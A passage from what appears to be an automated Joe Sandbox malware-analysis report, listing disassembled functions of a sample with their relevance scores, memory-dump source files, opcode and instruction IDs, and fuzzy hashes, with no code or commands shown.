                                                              • Opcode ID: 44ac858ee5f0fc3f81803183741d57923c6bb98f2b15c1c057eac2561ea5750d
                                                              • Instruction ID: ab1b59415645ab81cd87f4a42c1745361757537d624e5d384f80b729b6ce9601
                                                              • Opcode Fuzzy Hash: 44ac858ee5f0fc3f81803183741d57923c6bb98f2b15c1c057eac2561ea5750d
                                                              • Instruction Fuzzy Hash: FA81EA72D14B829BD3198F68C8906B6B7A0FFDA314F14971EEAEA07743E7749580C741
                                                              Function 012035B0 Relevance: .2, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee726186c788c664535448a820c1fb85317cacb34421184c0c940f1e10eca9d5
                                                              • Instruction ID: b1b0e35368f3dfdaff823e24fd92334b2e3414646c884079b5aad0b0b0d05663
                                                              • Opcode Fuzzy Hash: ee726186c788c664535448a820c1fb85317cacb34421184c0c940f1e10eca9d5
                                                              • Instruction Fuzzy Hash: 00614872D287918FD316CF28C8806697BA2FFC6314F2983ADE9951B397E7749A41C740
                                                              Function 0121A000 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction ID: 7d0d18a9719936b35e7e47c2ace0e289605319b8d5bf651aa9eebd4fba78fdb6
                                                              • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction Fuzzy Hash: F231C53171A35A4BC715EDADC4C032AF6D79BE8260F55C63DE689C3389E9B18C488781
                                                              Function 01079980 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b1bfc2c4732e7c476e6b46f5c9e24aaa174a52cf4d98bcdd34b50caf0c7d2cb
                                                              • Instruction ID: 313505505ebf0cdbbd1e2d97939e3d85ed8e226cf2139c41bf6d3e0e5b5ba13f
                                                              • Opcode Fuzzy Hash: 4b1bfc2c4732e7c476e6b46f5c9e24aaa174a52cf4d98bcdd34b50caf0c7d2cb
                                                              • Instruction Fuzzy Hash: 6DB01231D002008B6717C93CD8710D132B273C122435BC4E8D0034A016D636E0068745
                                                              Function 00EF6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 6cf5609dde558f9c12c104c8695f5146d503d97ccbcfa33edbb1b4794b3863e6
                                                              • Instruction ID: 92f6613a6385ffafed56a03279054b67b9e0d4ca430e1e6b5e445f573fbd4a87
                                                              • Opcode Fuzzy Hash: 6cf5609dde558f9c12c104c8695f5146d503d97ccbcfa33edbb1b4794b3863e6
                                                              • Instruction Fuzzy Hash: D8B17771A0838D6BDB399A34C89077BBBD8EFA530CF18652DEBC5E6181E765CC448352
                                                              Function 0121B1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: islower
                                                              • String ID: $
                                                              • API String ID: 3326879001-3993045852
                                                              • Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                              • Instruction ID: de047716261237442c373baa97846b384045e8065f40d874f8a8966c49c358b0
                                                              • Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                              • Instruction Fuzzy Hash: 3A61F9706283468BC714DF6CC48026FFBF2AFE9314F548A2DE9D587399E2B0D9458742